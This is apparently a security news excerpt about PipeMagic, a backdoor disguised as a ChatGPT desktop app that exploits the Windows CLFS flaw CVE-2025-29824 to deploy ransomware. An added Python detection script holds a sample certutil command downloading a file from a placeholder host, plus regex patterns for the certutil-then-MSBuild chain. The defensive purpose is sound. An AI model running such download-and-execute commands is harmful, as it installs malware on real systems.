PipeMagic Malware Imitates ChatGPT App to Exploit Windows Vulnerability and Deploy Ransomware
The PipeMagic malware, attributed to the financially motivated threat actor Storm-2460, illustrates how threats keep evolving: it poses as the genuine open-source ChatGPT Desktop Application from GitHub.
This sophisticated modular backdoor facilitates targeted attacks by exploiting CVE-2025-29824, an elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS).
Microsoft Threat Intelligence identified PipeMagic during investigations into attack chains where adversaries used certutil to download a malicious MSBuild file from compromised legitimate websites, leading to in-memory execution of the backdoor.
Once deployed, PipeMagic enables privilege escalation and ransomware deployment across sectors including IT, finance, and real estate in regions like the United States, Europe, South America, and the Middle East.
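As an added detection example (not code from the original article, Microsoft, or the malware itself), the Python below correlates the delivery chain described above: a certutil download on a host followed shortly by MSBuild loading the file that was just downloaded. The sample events, hostnames, file paths, and the example.invalid URL are constructed for the demonstration.

```python
"""Correlate certutil downloads with a later MSBuild run of the same file on one host."""
import re
from datetime import datetime, timedelta

# Constructed process-creation events (not real telemetry); one malicious chain on ws01.
SAMPLE_EVENTS = [
    {"ts": "2025-04-08T10:00:01", "host": "ws01",
     "cmd": r"certutil -urlcache -split -f http://example.invalid/update.txt C:\Users\Public\a.proj"},
    {"ts": "2025-04-08T10:00:20", "host": "ws01",
     "cmd": r"MSBuild.exe C:\Users\Public\a.proj"},
    {"ts": "2025-04-08T11:30:00", "host": "ws02",
     "cmd": r"certutil -hashfile C:\tools\setup.exe SHA256"},      # benign: no download
    {"ts": "2025-04-08T12:00:00", "host": "ws03",
     "cmd": r"MSBuild.exe C:\src\app\app.csproj"},                 # benign: no preceding download
]

# certutil download syntax: -urlcache [-split] -f <url> <output file>; capture the output path.
CERTUTIL_DL = re.compile(r"certutil(?:\.exe)?\s+.*?-urlcache\b.*?-f\s+\S+\s+(\S+)", re.I)
# MSBuild invoked on a project-like file; capture the file path.
MSBUILD_RUN = re.compile(r"msbuild(?:\.exe)?\s+.*?(\S+\.(?:proj|csproj|xml|txt))", re.I)


def find_certutil_msbuild_chains(events, window_seconds=300):
    """Return (host, downloaded_path, msbuild_cmd) for every certutil download that is
    followed within window_seconds, on the same host, by MSBuild loading that same file."""
    downloads = {}  # (host, lowercased path) -> download timestamp
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        m = CERTUTIL_DL.search(ev["cmd"])
        if m:
            downloads[(ev["host"], m.group(1).lower())] = ts
            continue
        m = MSBUILD_RUN.search(ev["cmd"])
        if m:
            dl_ts = downloads.get((ev["host"], m.group(1).lower()))
            if dl_ts is not None and ts - dl_ts <= timedelta(seconds=window_seconds):
                hits.append((ev["host"], m.group(1), ev["cmd"]))
    return hits


if __name__ == "__main__":
    for host, path, cmd in find_certutil_msbuild_chains(SAMPLE_EVENTS):
        print(f"{host}: certutil download of {path} followed by: {cmd}")
```

The correlation keys on the downloaded file path, so a benign build or a benign certutil invocation alone does not fire; tune window_seconds to your environment.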
Enables Zero-Day Exploitation
The malware’s architecture emphasizes flexibility and persistence, dynamically loading payloads via a dedicated networking module for command-and-control (C2) communication over TCP, while employing encrypted inter-process communication through named pipes ...
Copyright of this story solely belongs to gbhackers.